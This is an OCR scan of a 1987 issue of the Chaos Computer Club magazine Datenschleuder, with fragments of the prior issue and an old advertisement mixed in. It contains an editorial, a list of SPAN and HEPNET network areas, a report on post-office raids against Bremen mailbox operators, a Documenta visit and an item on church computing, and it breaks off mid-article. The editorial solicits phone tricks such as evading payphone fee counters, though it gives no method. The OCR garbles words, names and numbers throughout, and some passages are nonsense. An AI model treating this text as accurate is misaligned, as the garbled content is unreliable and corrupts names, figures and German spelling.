Berichtete die Hamburger Morgenpost (30.5.87) da¬ 
von, daß es nun endlich einen EC-Kanen-Notruf in 
Frankfurt gibt (0697747700; Bank, BLZ, Komo-Nr., 
Kartennummer und Vcrfalldatum müssen genannt 
werden), so ist man in Amerika schon weiter. Dort 
wird ein Gerät produzien, das erst nach positivem 
Fingerabdmck-Vergleich Geld rausruckt. Der Kund 
steckt einen Finger in den Geldautomaten, dieser 
schickt das Abdruckbild an die Zennale und be¬ 
kommt Antwort. 


(aus Capital, Juni 87) 




IMPRESSUM 

SntciiSrfjlciibcr 




Numero 21 - Juni 19871 
Das wissenschaftliche Fachblait 
für Dalenreisende 
D-2000 Hamburg 20 
Schwenckestrasse 85 
ViSdP: Reinhard Schnitzki 
Herausgeber : Cnaos Comouef Quo 

Mitarbeiter (u.a.); 

Herward Holland-Moritz, S. Wemery, 

A. Eictiler, Marina Kern, P. Franck, 

H. Gmsel, M. Kuehn, AndyM.-M.,S. Stahl,| 

Geonet; Geol: Chaos-Team 
CLINCH : Chaos-Team 

BIX 655322 

Nachdruck für nichlgewerbliche Zwecke 
bei Quellenangabe erlaubt. 
Zweifarb-FußabDmck im Selbstverlag. 


l 

üi^wciraro-ruDapur 






Numero 21 - Juni 19S7 SGit8 19 







Numero 22 - Juli 1987 



Postvertriebsstück 

C9927F 


WcDo uBittstellbar 
ÄDSchrifteuasscbikitt bitte 
mit acuer Adresse zurück 


DM3,00 


Siie SiatenSi^Ieuiiec 

Das wissenschaftliche Fachblatt für Datenreisende 

Ein Organ des Chaos Computer Club 



..■rnTm.'iiiimiiiiiiiiiMiiiiii 

C.L.I.N.C.H. 

COMPUTER & MEDIENBERATUNG 


Mailboxsysteme (Ur 
Telefon & 

Datexanschluß 
inhouse - Kommunikation 
SystemA Softwareinstallation 



... 





flrulfdif fiollci’irli niordiincn 
ß(fcll|'diiifr Dl. Ii (j ÖcrliD 




SnfciiJrfjIcuicr 



Seile 20 
















Puzzlespiel Quatschexplosion 

Lösung zum DS21-Ratselartlkel 

Nachdem unsere letzte DATENSCHLEUDER 
fertig gelajoutet war, dachten wir: nur noch zum 
Drucker und in den Versand; wieder einmal ein 
Meilenstein geschaffi. Doch weit gefehlt. 
Nachdem ich meinen eigenen Artikel, den ich 
auch selber geiayoutet hatte, gelesen habe, 
kommt mir das kalte (trotz 27 Grad drauflen) 
Grausen. Da habe selbst ich Probiemem, die ein¬ 
zelnen Textschnipsel DER RICHTIGEN RE J- 
HENFOLGE zu lesen! Mi$L verdammter, dachte 
ich mir und setzte mich an diesen hier. Nach dem 
Motto “die Auflösung des Knotens verraten wir 
Ihnen morgen“ nun die Lese-Anweisung für den 
Artikel “Die Quatschexplosion“. Mit großer Ent¬ 
schuldigung. 

Von Seite 4, oben, bis Seite 6, Mitte. 2. Absatz: alles 
ok. 

Dann, nach: “BRS/Search, ME=Auswaheinstiegs- 
menue, MQ=Auswahi“ 

Sprung nach Seite 7, links oben, und weiter mit: “des 
Sachgebietes...“ 

Anschließend alles ok bis Seite 7, rechte Spalte, 
Ende 1. Absatz. 

Nach: “...wegen ihrer elektronischen Verfügbarkeit 
für geheim erklärt wurden.“ Sprung nach Seite 6, 
linke Spalte, 2. Absatz Mitte, ab:“Hier setzt auch die 
Kritik an:...“ 

Anschließend wieder alles paletti bis Seite 6, rechte 
Spalte Ende: 

Nach: “DM 19(X).-" Sprung nach Seite 8, Unke 
Spalte Anfang, und weiter bei: “Somit Erpanüs 
monatUch...“ 

Wiedenun alles in Butter bia Seite 8, rechte Spalte, 
1. Absatz Ende: 

Von: “..verschiedene Versionen der Technik.“ 
Sprung nach Seite 7, rrehte Spalte, 2. Absatz An¬ 
fang, weiter bei:“Dagegen ist bei den CD-ROMs...“ 

Und wieder ungestört weiter bis Ende Seite 7, 2. 
Spalte: “..bei einer Auflage von KKX) Stück.“, von da 
ab Sprung nach Seite 8. rechte Spalte, 2. Absatz 
(leicht zu erkennen, da verrutscht) :“Schön war die 
CD-I...“ und in aller Ruhe weitcrlescn bis zum 
Schluß. 

PX- 8 /a:pu 2 zel.txt A.EichIer 87063015:24 
CUNCHIDS-REDIGOBIJNI13.07.87109:1511513 

Seite 2 



Was ist noch kleiner als 
der Punkt auf dem Rücken 
eines Marienkäfers? 



Eins „iniegriaric Scticliuno' 
vanTELEFUN : nur Imm braUl froUdAm 
übernimmt diaeer Ulkro>Bauat«in die 
Furkiionen von 2 rranalaioren und^Widar* 
sidncen. unaata Eiakironen'Racnnar zum 
fiaiapiel arbaiien mit Tautandan solcher 
winzig kleinen aautalla. Ohne diaaa Mikro- 
Elemanta wären die Rechanaggregaia 
mehr als zehnmal ao groS. 
Mikro-Mlniaturlsierung lat ein aahr wicniigea 
Arbeitsgebiet lür TELEFUN . Dann die 
hier gewonnenen Erkenntnlaaa kommen letzten 
Endes auch unaaran Heimgaritan zugute- 
und damit Jedem TELEFUN Käufer. 



28.0S.-'SO-OB. Sysoptreffeo in Berüa 
Der IPN, CCC und CAC ladeo zum Tr^en 
der Mailboxbetreiber. Veransultuagsott üt 
der Mchringhof in BerUn. Axuoeldung bei: IPN, 

H J^opper, Bniseodorfer Str. 20.1 BerUn 44. 

28.0$. - 14.09. Intemadoaile FunksussieUung Ber¬ 
Un 

Die Koosumelekaoaik Ufit GiüSeo. 

HackemelFDienstag am Postsund um l6Uhr. 

12.09. -13.09. CCCtWortshop in Hamburg 
Beginn der Testphase von BTXNET. Maüboxbe- 
treiber beginoen mit Testbecrieb 
cinei dgeaen Neues. Oc EideUtedter 
BQrgerhaui. Auf Hnladung. 

19.10. • 23.10. SYSTEMS in MOchnchen 
Hackeroeff Diensug am Foststand 16 Uhr. 

28.12. • 29.12. Ol am Conusunicidoa Coogxess 
1987-Hamburg 

Die europäische Hackerpaity. Niberes ün Oktober. 

Wdtere Hinweise in den Ba-Progiuzmxn de« CCC 
CAC und der BHP. 

Eneicbbar Uber *653322«. 

S)afcodri!jfcp&cc 


Editorial 

Lieber DATENSCHLEUDER Leser, 


in den letzten Monaten hat sich nicht nurdas Gesicht, 
sondern auch der inhaltliche Schwerpunkt der DA¬ 
TENSCHLEUDER verändert. Während in den er¬ 
sten Ausgaben vorwiegend Tricks, Kniffe und kleine 
Hilfestellungen im technischem Alltag verbreitet 
wurden, lag der Schwerpunkt in den letzten Aus¬ 
gaben mehr auf allgemeinen Betrachtungen zur In- 
formationsgesellschaft, deren Erscheinungen und 
Folgen. Diese etwas einseitige Gewichtung wird 
nicht nur von Lesern kritisiert, sie liegt auch der 
Redaktion im Magen. 

Die erste Gemeraion der Datenreisenden rückt dem 
gesetzterem Alter näher, Arbeit und Beruf nehmen 
den ersten Platz ein. Die Zeit für aufwendige Hack’s 
wird rarer. Das Hacken als solches verliert an Stel¬ 
lenwert. Interessanter werden inhaltliche und auch 
politische Auseinnanderseizungen mit den Ent¬ 
wicklungen zur Informationsgesellschaft. Anderer¬ 
seits fehlt Teilen der zweiten Hackergeneration oft 
die gewisse Ernsthaftigkeit. Das führt unter anderem 
auch zu geringen Rückflüssen aus unserem Leser¬ 
kreis. Unser Ziel war es eigentlich nicht, Fast- 
Food-Informationen (fressen und vergessen) zu ver¬ 
breiten. 

Diemeisten Artikel der DATENSCHLEUDER wer¬ 
den von einem kleinen Kreis von älteren Mitarbei¬ 
tern geschrieben. Zwar erreichen uns ab und zu 
Hinweise, die sich zu einem Artikel aufbereiten 
lassen, insgesamt gehen aber viel zu selten ver¬ 
wertbare Beiträge aus der Leserschaft ein. Wir rufen 
hiermit dazu auf, die DATENSCHLEUDER durch 
Beiträge und Informationen zu unterstützen. Dies 
gilt ebenso für den zum Herbst geplanten zweiten 
Teil der Hackerbibel. Knete haben wir natürlich 
nicht, aberu.a. die wiederholte Namensnennung des 
Autors im Impressum ermöglicht so manchen preis¬ 
werten Messebesuch als Journalist, welcher wie¬ 
derum neue Erkennisse und Kontakte vermittelt. 
Mit einer Geschichte über das Telefonnetz in Kairo 
und einer Anleitung zur Benutzung ägyptischer Te¬ 
lefonzellen beginnen wir in diesem Heft eine Reihe 
unter demTitel Die Wahrheit über das Globale Dorf. 
Im nächsten Heft gibt’s einen Bericht über ein Te- 
lecommunication Trainings Center in Nepal. Auch 
für diese Reihe würden wir uns freuen über Material, 
das uns aus der werten Leserschaft erreicht. Denn: 
“These are the days of lasers in the jungle“ (Paul 
Simon). 

©nicnSd^Icukcr 



Für eine der nächsten Ausgaben bereiten wir au¬ 
ßerdem einen ausführlichen Bericht über alle uns 
bekannten Tricks rund ums Telefon vor. In dieser 
Sache bitten wir um Berichte und Informationen 
über alle bekannten Tricks und Kniffe, sei es das 
Umprogrammieren von Nebenstellenanlagen zur 
Anrufweiterschallung oder das Umgehen der Ge¬ 
bührenzähler in Telefonzellen. Wir werden (imRah- 
men der gesetzlichen Möglichkeiten) das Material 
aufbereiten. 

Wir wollen auch weiterhin versuchen, mit der DA¬ 
TENSCHLEUDER ein offenes und ein wenig sub¬ 
versives Organ zu betreiben. Ohne eine Unterstüt¬ 
zung durch unsere (auch jüngeren) Leser ist das 
kaum zu leisten. 


Steffen 

LS23 

Seite 3 















Networking 


Das Space Physics Analysis Network, kurz SPAN 
genannt, wächst exponentiell über den Kurs des 
letzten Jahres hinaus. Während dieser Periode ver¬ 
dreifachte sich die Anzahl der Netzwerkkreise (net- 
work areas). Die Zahl der über SPAN erreichbaren 
Computer stieg auf über 1.600 VAX-SuperMini- 
Sysieme. 

Die Vielfalt der Netzwerkteilnehmer erforderte in 
letzterZeitdie Einrichtung einer Koordinations-und 
Infoimationszentrale. Das SPAN Network Infor¬ 
mation Center (SPAN-NIC), geleitet vom (US) Na¬ 
tional Space Science Data Center, übernahm die 
Aufgabe des Netzwerk Managements, Das SPAN- 
NIC verfügt über eine Datenbank zur Pflege und 
Verwaltung des SPAN-WAN (Wide Area Net¬ 
work). Die Datenbank ist auch für User erreichbar, 
denen ein Zugang zum SPAN-DECNET fehlt, denn 
es besteht eine Schnittstelle zumTELENET (X25), 
dem NASA Packet Switched System (NPSS) und 
dem ARPANET. 

SPAN bietet seinen Unsem ebenfalls Schnittstellen 
zu anderen DECNET-LAN’s (Local Area Net¬ 
works), unter anderem HEPET, TEXNET und INF- 
NET. Zusammen ergibt sich in der westlichen Welt 
ein Super-Netzwerk mit einem ziemlich giganti¬ 
schen Potential an Forschung und Wissenschaft. 

Die Stmktur des SPAN der Vereinigten Staaten 
basiert auf den Verbindungen einer Vier-Steme- 
Topologie. Jeder Stern des Netzes besitzt als seinen 
Kern einen sogenannten Router bzw. Knotenrech¬ 
ner. Router im SPAN sind das GSFC, MSFC, Jet 
Propulsion Lab (JPL) und das Johnson Space Center 
(JSC). Alle Router kommunizieren über 56 KBaud 
Standleitungen miteinander, sowie mit 9600 Baud, 
der niedrigsten Geschwindigkeit im DECNET, zu 
den Nebenrechnern. 

Die europäische Komponente des US-SPAN, das 
EURO-SPAN, wächst ebenfalls rapide. Die 
DECNET-Schnittstelle zwischen EURO-SPAN und 
US-SPAN wird durch eine 9600 Baud DATEX-P- 
Verbindung hergestellt. Den europäischen Router 
verkörpert eine VAX 11/750 des European Space 
Operation Center (ESOC) in Dannstadt. DerESOC- 
Knoten teilt sich wiederum an andere deutsche In¬ 
stitute wie die European Molecular Biological La¬ 
boratories (EMBL) und das Max-Planck-lnstitut 
(MP!). 

Seite 4 


Im September 1986 wurde eine Vernetzung des 
SPAN mit dem weltweiten High Energy Physics 
Nenvork (HEPNET) vorgenommen, welches eben¬ 
falls auf der VAX/VMS DECNET-Ebene basien. 
EURO-HEPNET und US-HEPNET bedienen sich 
einer X25-Leitung zwischen dem europäischen Lei- 
trcchner VXCRNA, einem VAX8650-Cluster des 
CERN in Genf, sowie den Cal Tech Laboratories, 
dem Fermilab, und MIT in Boston/USA. Eine 
DECNET-Verknüpfung zwischen dem CERN Area 
22 und dem Area 28 des MPI ist für den Sommer 
1987 geplant. 

Die größte DECNET-Area des SPAN stellt das 
TEXNET. TEXNET verknotet die drei Staats- 
Universitäten Texas A&M, das DECNET der Uni¬ 
versität Texas, sowie die Universität von Huston. 
Allein im Januar 1987 waren über 400 VAXen dem 
TEXNET verbunden. 

Nachfolgend sind die wichtigsten miteinander ver¬ 
knüpften DECNET-Areas aufgefühn: 

1 SPANLOS Alamos National Laboratories 
SUNETSweden Univ. Network 
2HEPN'ETUniversity of Wisconsin 
3SPANUnivcrsity of Miamy + Ocean Labs 
4HEPNET/SPANExperimental Gateway 
SSPANJet Propulsion Laboratories 
CCNETStevens Institute of Technologies 
eSPANNASA'sGoddard Flight Center 
7HEPNETCal Tech 
SPANNASA’s Marshali Space Center 
SSUNETSweden Universiiy Network 
9SUNETSweden University Network 
lOTEXNETTexas Universitics 
1 INICENETNaval Research Laboratories 
12HEPNETUniversity of Boston 
12UCSBUniversity of California 
14CCNETUniversity of New York 
l5CCNETNew York University 
16EURO-HEPNETSPAIN 
17HEPNETHarvard University 
18DAN (SPAN)NRC-Canada Ottawa 
19HEPNETCornell-C University 
20CHADNETSwitzerland 
21CCNETUniversity of Columbia 
22EURO-HEPNETCERN in Geneva 
23EURO-HEPNETAusma 
24SPANNASA’s Arnes Research Center 
25TEXNET/CHPCUniversity of Texas 
26TEXNET/CHPCUniversity of Huston 
27SPANJet Propulsion Laboratories 

S«tciigd|Icubcr 


28EURO-SPANESA nodes Darmstadt FRG. 

29SPANNASA 

30SPANJPL 

31 NIKHER'letherlarais 

32EURO-HEPNETFrance 

33SPANColorado State Wide Network 

CCNETUniversity of Pittsburgh 

34CCNETPittsburgh University Net 

35EURO-HEPNETPonugal 

CCNETNASA Flight Center 

36LANL/D0ELOS Alamos Labs / Dept. of Energy 

37CNR/EURO-HEPNETItaly 

38EURO-HEPNETItaly 

39INFNETliaIy 

40HEPNETJapan 

41HEPNETStanford Centers/SLAC 
42HEPNETFermilab 
43HEPNETBrookhaven 
44-49HEPNETHEPNET 
50DPHPEFrance 
52EURO-HEPNETBelgium 
S3EURO-HEPNETAustTia 
54STARLINKUniied Kingdom 
55HEPNETBrown University 
56EURO-HEPNETSweden 
59EURO-HEPNETWest Geimany 
60LEP3NETM1T Boston 


S-Stahl 



Vtg 533/1987 

AHg«metne Zulassung einzelner einfacher mechanischer pas* 
siver Kontakte eis Fernwirkendeinrichtung für den Betriebs' 
versuch TEMEX 

.Ausnahmsweise werden für den BeineDsversuch TEMEX nach § 53 
Cer Femmeideordnung (Obergargsvorschnften zu § 38c Nr 2) 
einzelne einfache mechanische passive Kontakte zur Anschlie3ung 
an posteigene TEMEX-Neizabschlüsse wrderruiltch zugeiassen. 

Oie^ Kontaide könrten auch in beiiecigen pnvaten Geräten in Form 
emes'Kontaktes eines elektromagnetischen Relais realisiert sein, 
das die erforderliche galvanische Trennung zwischen Spulenslrom- 
kreis und Relaiskontakt nach DIN 27804A/0E 0304, Abschnitt 
12.2b. gewährleistet {elektromagnetische Relais, die von Stark* 
Stromkreisen erregt werden und Femmefdekreise schalten). 

SatcnSrijlciibcr 



Alles retour 

Datex-PZOF ab August w/ieder preiswerter 


Nun ist es amtlich: Wie das BPM mitteilt, wird zum 
!. August wieder der alte Leistungsumfang beim 
Zugang zu Datex-P20F und zur Telebox angeboten. 
Die Post gibt als Grund technische Schwierigkeiten 
mit der neuen Netzstuktur an. Verkennen tun die 
Herren in Bonn und Dormstadt immer noch, daß der 
zum April geänderte Zugang und die damit ver¬ 
bundene Kostenstruktur eigentlicher Auslöser für 
den Rückgang der Nutzungszeiten in diesem Dienst 
sind. Der jetzt wieder preiswerte Zugang ist jedoch 
nur eine vorübergehende Erscheinung. Sobald die 
Post ihre Technik im Griff hat, wird alles wieder 
geändert und damit auch teurer. Bleibt zu wünschen, 
daß die Herren niemals fertig werden. 


LS23 



Seite 5 



Katz und Aus 

Post klemmt Mailboxen ab. 


Bremen (CRD): Am Donnerstag, den 16. Juli 
legte die Bremer Post in einer konzertierten Ak¬ 
tion fünf Bremer Mailboxsysteme lahm. Unter 
Berufung auf Gefahr im Verzug startete die Post, 
unterstützt durch Kriminalbeamte, der Bremer 
Polizei bei den betreffenden Mailboxbetreibern 
gleichzeitig um 21 Uhr die Hausdurchsuchungen. 
Ermittelt wurde wegen des Verdachts auf Ver¬ 
stoß gegen das Fernmeldeanlagengesetz. Wie die 
Pressestelle der Oberpostdirektion (OPD) Bre¬ 
men mitteilt, wurden bei den Hausdurchsu¬ 
chungen “mechanische Zusatzeinrichtungen“ 
(auch bekannt als KATZE) sichergestellt. 


Wie der CCC ermittelte, wurden auch nichtgeprüfte 
MODEMS und angeschlossene Telefone sicherge¬ 
stellt. Weiterhin stellte die PostGerätesicher.diemit 
wenigen Handgriffen (Modem-Kabel neben der 
Postdose liegend) anschließbar gewesen wären. 
Über sichergestellte Computer und deren (bei Mail- 
boxsystemen vertrauliche) Daten bestände ist nichts 



Wie schon in anderen Städten setzt die Post verstärkt 
die Aufdeckung “illegal“ installiener Modems und 
Katzen, besonders an Mailboxsystemen fon. Auch 
aus Köln wurden in der Vergangenheit derartige 
Aktionen gemeldet. Das gezielte Vorgehen gegen 
nahezu alle Betreiber im Bereich einer Oberpostdi¬ 
rektion ist jedoch neu. 


Wie nähere Recherchen jetzt ergaben, geht die Ak¬ 
tion der Post ursprünglich auf eine Gebührenbe¬ 
schwerde eines Fernsprechteilnehmers zurück. Die¬ 
ser wunderte sich über seine sehr hohe Telefon¬ 
rechnung und beantragte eine Zählervergleichsein¬ 
richtung. Beim Vergleich der protokollierten Ruf¬ 
nummern wurden die unzulässigen Ankopplungen 
festgestellt, die übrigens mehrfach am Tag ange- 
wählt wurden. Nun gab es etwas trouble in der 
Familie, denn als Vemrsacher kam nur noch der 
computerbegeisterte Sohn in Frage (der im übrigen 
bis zum Versandlag der Fernmelderechnung selber 


eine Mailbox betrieben hatte). 



lSntcnSd)lcubet 


Ähnlich “dumme“ Geschichten von “Denunzian¬ 
tentum“ konkurrierender Mailboxsysteme wurden 
auch schon aus Köln gemeldet. Dort haben Mailbox- 
Betreiber sich gegenseitig die Post ins Haus ge¬ 
schickt - frei nach dem Motto “Meine Box ist post¬ 
geprüft, also weg mit der Konkurrenz!“. B ishermuß- 
te das Fernmeldeanlagengesetz schon mehrfach für 
hintergründige Zensur herhalten. Firmen, die z.B. 
Raubkopierer jagen, ließen auf diesem Wege un¬ 
liebsame Veröffentlichungen aus dem Netz entfer¬ 
nen, Die Post (leider oft zu blind, um zu verstehen, 
wie sie mißbraucht wird) macht dabei gerne mit. 

Seit langem warten Mailboxbetreiber und Compu¬ 
teranwender auf die Freigabe preiswerter privater 
Modems. Die Post, die nach einem EG-Urteil zur 
Zulassung privater Modems verpflichtet ist, sperrt 
sich immer noch unter Berufung auf noch nicht 
vorhandene und abgestimmte Zulassungsbedin¬ 
gungen. Die von der Post angebotenen Modems 
dürfen vielfach nicht an den preiswerten Heim- 
computem betrieben werden und sind von den hohen 
Gebühren her für viele Anwender nicht finanzierbar. 

Bisher wurden vielfach “mechanische Zusatzein¬ 
richtungen“ zum Abheben der Telefone geduldet. 
Bei dieser Form der Ankopplung liegt äer Tele¬ 
fonhörer permanent in einem (geprüftem) Akustik¬ 
koppler, während eine Hilfsmechanik den Abhebe¬ 
vorgang steuert. Das Vorgehen gegen diese in der 
Fernmeldeordnung nicht berücksichtigten Ankop¬ 
plungen nimmt vielen Mailboxbetreibern die letzte 
Möglichkeit, ihr Informationssystem innerhalb ihres 
Taschengeldbudgets zu betreiben. Der Chaos Com¬ 
puter Club verurteilt das Vorgehen der Deutschen 
Bundespost auf das Schärfste. Eine Duldung me¬ 
chanischer Ankopplungen liegt durchaus im Rah¬ 
men der Gesetzgebung. Dieses zu Beurteilen ob- 
gliegt der Post, welche ohne weiteres in der Lage 
wäre, durch eine entsprechende Anweisung die Si¬ 
tuation auch zugunsten der engagierten Compute¬ 
ranwender zu entschärfen. 



Zu hoffen ist, daß nach einer Zulassung von privaten 
Daten-Modems Drahtseilaktemit technischen Hilfs¬ 
mitteln nicht mehr nötig sind und Mailboxsysteme, 
wie weltweit üblich, ohne großen Kostenaufwand 
am Fernsprechnetz betrieben werden dürfen. 


Seite 6 


Mailboxbetreiber, die ihre Systeme nicht den Vor¬ 
schriften entsprechend betreiben, sollten sich einst¬ 
weilen nicht zu sicher fühlen. Bei einer Haus¬ 
durchsuchung bleibt oft kaum Zeit, die Geräte vom 
Netz zu trennen. Der Tatbestand, mit wenigen Hand¬ 
griffen anschließbar zu sein, reicht für die Sicher¬ 
stellung (und als Rechtfertigung für eine Durchsu¬ 
chung) aus. Solange die Post als Handlanger im 
Interesse Dritter handelt und selber zu einfältig ist, 
dies zu durchschauen, genügt wie in Bremen ein 
Zufall, um sich handfesten Ärger einzuhandeln. 

LS23 

Die Knust und ihre Knüstler 

CCC-Visite auf der Dokumenta 8 

Eines schönen Tages klingelt bei Peter das Tele¬ 
fon. Dran ist Karel Dtidesek (alias Dudelsack) 
von Minus Deila T (-D(). Über bestehende Ver¬ 
bindungen zwischen -Dt und CCC siehe auch 
HACKERBIBEL Seite 32/33. 

-DT möchte, “daß der CCC auf der Dokumenta 
präsent ist“, um dem computerignoranten Ambiente 
ein wenig entgegenzuwirken. Der CCC mochte 
auch. Am Dienstag den 14.7.1987 war der histori¬ 
sche Tag, an dem die CCC-Abordnung hinterm 
Mond landete, auf dem Felde der Computerigno¬ 
ranten. 

Auf zum Public Relations Zentrum. Widerstandslos 
wurden uns Pressekarten ausgehändigt; offenbar 
halte man hier noch nie vom schreckenerregenden 
CCC gehört. Dazu gab’s die Diätversion einer Pres¬ 
semappe; verwöhnt von der Cebit und anderen Mi- 
croMessen hatten wir damit gerechnet, einen Aus¬ 
stellungskatalog in die Hand gedrückt zu bekom¬ 
men, anhand dessen man sich seinen Weg durch 
diverse Häuser, Räume und Plätze erlaufen könnte. 
Nix. Mehr als allgemeines Blabla gabs nicht; 

“Eine Medienkunst, die sich nicht mehr, wie zum 
Beispiel Video oder Performance in den 70er Jahren, 
privatistisch zurückzieht, sondern auf großen Wän¬ 
den. in der 'Vermischung mit Unterhaltungsele¬ 
menten öffentlicht macht. Einer Kunst, die das kul¬ 
turelle und soziale Umfeld ernst nimmt und sich ihm 
stellt, die mit bildnerischen Argumenten kommen¬ 
tiert, appelliert, interveniert.“ Oder: “Der Weg in die 
Gesellschaft erfolgt nicht nur über Ikonografie und 
Thematik, sondern auch über die Anknüpfung an 
Benutzbarkeit und Funktion.“ 


Ich stellte fest, daß an allen Kuntwerken, an denen es 
etwas zu daddeln gab oder auf die man sich setzten 
konnte, entweder “Bitte nicht berühren“ stand oder 
ein Absperrseil dasBesteigen (Erstbesteigungeines 
Kunstwerks ohne Sauerstoffgerät) verwehrte. 

Ich will nicht behaupten, ich hätte alles gesehen, was 
die Dokumenta bietet. Das, was ich gesehen habe, 
hat mir nicht gefallen. Kaum ein Kunstwerk hat mich 
mehr als ein paar Sekunden fesseln können. Nur drei 
habe ich ansprechend gefunden: Den ausgestellten 
GRID Computer (Designer-Kunstwerk), einen auf 
eine Drehscheibe gestellten Mercedes 300 CE, und 
den “erweiterten Schwitters“, eine automatische 
Holzstockfigur, die mit Druckluft funktioniert. 



Das hat weder mit einem Hang zum Teuren noch zur 
Technik zu tun - etliche der anderen Ausstelluns- 
stücke sind bestimmt teurer als die genannten - 
sondern mit deren klarem Design. Weswegen sie 
auch in der Designausstellung (in der Orangerie) 
stehen. Beachtenswert fand ich auch, daß es eine 
Video- und Audiothek gibt. Videothek mit zwei 
kleinen Kabinen, in denen man selbst ausgewählte 
Videos an sehen kann, und einem Großbildprojcktor, 
auf dem ein ständiges Programm läuft. In der Au¬ 
diothek kann man sich seine KunstOhrwürmer in 
einer Art Raumfahrersessel anhören kann. 

Ich war um eine gegen Hinterlegung eines noch- 
nichtfälschugssicheren Persos geborgte Video 8 Ca¬ 
mera reicher. Sony sponsert die Dokumenta mit 
etlichen TV-Monitoren und dem kostenlosen Han- 
dycamverleih, eine gute Idee, Nur die Videocasselte 
muß man mit 10DM bezahlen, falls sieeinem gefällt. 

Ich wanderte zu dem Gelenkbus von Minus Delta T. 
Weiss, etwa zwweiundzwanzig Meter lang, in der 
Mitte mit Plastikknautschzone, so 120 Qubikmeter 
umbauter Raum. Drin zwei Computer, zwei Dmc- 
ker, drei Monitore, zwei Synthesizer, mehrere Ta¬ 
pes, drei TV-Monitore (auf dem einen lief ständig 
irgendein Sateliten-Programm), einige Sitzgele¬ 
genheiten, ein Büchergrabbeltisch etc. An der Spitze 
des Busses, neben der Gefriertruhe mit Getränken, 
eine gigantische Satelliten-Empfangsschüssel. An 
der Querseite zwei große Lautsprecher, obendrauf je 
ein Monitor aus dem Bus und ein Glashaus, in dem 
die-Radiosendungen produziert werden. Das ganze 
steht auf dem Platz neben dem Staatstheater, auf dem 
Weg vom Fridericianum, wo die Hauptausstellung 
ist, zur Orangerie. 

©nlcnSdjIcubcr 


Seite 7 





Als Wau eintraf, produzienen wir auf einer nahen 
Wiese im Halbschatten (Tonqualität entsprechend) 
ein Interview, das als Werbetext für unseren abend¬ 
lichen Vonrag (“DerCCC, das Leben und das Uni¬ 
versum“) über Radio gesendet werden sollte. Schon 
beim zweiten Anlauf wurde was draus. Während der 
Abend immer näher rückte und wir an Erholung 
dachten (keine Kunst mehr), kamen die ersten In¬ 
teressenten, um uns auszuquetschen, sodaß wir zu 
spät zum New York, dem Vortragsort, aufbrachen. 

Erzählt haben wir über den CCC: was wir sind, 
machen, arbeiten, aufregend finden, in welche Rich¬ 
tung nach unserer Meinung die Technologie treibt 
(nach vorne, hinten, oben, unten, links und rechts). 
Und, wichtigstes Thema: was wir über die Doku- 
menta & die computerlosen Künstler denken. Und 
was denken wir? Sowohl Wau als auch ich stellten 
fest, daß sich außer -Dt und Winfried Scheuer, der 
denGRID gestaltete, anscheinend kein Künstler mit 
der Mikroelektronik auseinandergesetzt hat. Wau 
meinte, es liegt an der Technikfeindlichkeit oder 
-ängstlichkeit dieser Leute (“Out Of Marmor Er¬ 
ror“). Sie sind anscheinend nicht in der Lage, derlei 
Feindlich- oder Ängstlichkeit innerhalb ihres Zeit¬ 
gefühls auszudrücken. 

Es gab keine Künstler (Ausnahme -Dt, negative 
Ausnahme: langweilige, gigantomaische Video¬ 
kunst), die neue Technik einsetzten, um zumindest 
versuchsweise oder in Gestalt eines vielfältigen und 
benutzbaren Environments (wie der -Dt-Bus “Für 
ein neues Leben“) daraus oder damit Kunst zu ma¬ 
chen, indem sie an dem beschaulichen, herkömm¬ 
lichen Kunstbegiiff kratzen. Unserer Meinung nach 
ist dies ein Fehler. Ein bedeutender Teil der gegen- 
wänigen Kultur wird schlichtweg nicht berück¬ 
sichtigt, sondern verdrängt. Man kann nur hoffen, 
daß in fünf Jahren, auf der nächsten Dokuments, 
Werke zu sehen sein werden, die sich mit diesem 
Thema beschäftigen. 

PX-8la:doku.txtLSni VI 870720/21 
CUNCHIDS-REDIGOBUNI21.07.87/16:19/9139 

Computer und Kirche 

Luthers Bibel auf Diskette gespeichert 

München (sz) - Die Luther-Bibel auf Diskette ist 
eines der “Großprojekte“ der “Christiiehen In¬ 
teressengemeinschaft für Computeranwendung“ 
(CHRIC) 

SflfcnSi^rcMhcr 


Seitdem der evangelische Pfarrer 
Werner Küstenmacher, der hauptberuflich die 
Abteilung “Neue Medien“ In der Evangelischen 
Landeskirche betreut, im Jahre 1984 die “Selbs¬ 
thilfeorganisation“ für computerbegeisterte 
Pfarrer gründete, erreichen ihn fast täglich Zu¬ 
schriften und Anrufe von ratsuchenden Theolo¬ 
gen und kirchlichen Mitarbeitern. 

“Der Computer im Pfarramt erfreut sich einer stei¬ 
genden Nachfrage“, stellt Küstenmacher, selbst ein 
leidenschaftlicher Computerfan, zufrieden fest. Be¬ 
reits zehn von 60 evangelischen Pfarrern in Mün¬ 
chen arbeiten mit elektronischer Textveraibeitung. 

In einem Pilotprojekt, das die Landeskirche in vier 
Münchner Kirchengemeinden durchführt, wird jetzt 
eigens erprobt, was die PC-Computer an Arbeits¬ 
erleichterung im Alltag der Pfarrämter bringen kön¬ 
nen. Pfarrer Markus Weidemann von der Naza- 
rethgemcindc ist nach anfänglicher Skepsis zum 
überzeugten Computer-Anhänger geworden: 
“Nachdem wir genügend Software hauen, standen 
unsere Mitarbeiter Schlange vor dem BildBchinn“. 

Das von Werner KUstenmacher herausgegebene In¬ 
formationsheft "CHRIC-Brief, das im evangeli¬ 
schen Pressedienst erscheint, unterrichtet regelmä¬ 
ßig mit vielen Tips und Tricks über den neuesten 
Stand der Computer-Technik. Vorgestellt werden 
zum Beispiel Systemprogramme, die jetzt schon 
spezielle theologische Bedürfnisse bedienen. Lie¬ 
blingsthema der neuesten Ausgabe: Hebräisch und 
Griechisch aus dem Computer. Es sei kein Wunder, 
das CHRIC ausgerechnet in München entstanden 
sei, meint Küslenmacher, “München ist ein kleines 
Silicon Valley, da kommen wir immer an neueste 
Informationen ran.“ 

Wenn der CHRIC-Mitgliederstamm von derzeit et¬ 
wa 500 Interessenten weiter zunimmt, wird bald 
eintreten, was sich Pfarrer Küstenmacher von seiner 
Initiative erhoffte: Ein Netzwerk von christlichen 
Computerbesitzem, die ihre Erfahrungen mit dem 
neuen Medium Computer austauschen. Ethische Be¬ 
denken gegen die Einführung der elektronischen 
Datenverarbeitung hat der Computerpfarrer nicht: 
“Solange der PC Hilfsmittel des Menschen bleibt, 
sehe ich keinen Grund zum Warnen“. 


9Ä. . ÜOOI 

Andreas Beuthner 

(Süddeutsche Zeitung, 21.4.1987) 


Seite 8 


Mit der Post ins Telex-Chaos 

Telex über BTX 

Telex über Bildschirmtexl - Damit wirbt die Bun¬ 
despost jetzt verstärkt für neue Btx-Teilnehmer. 
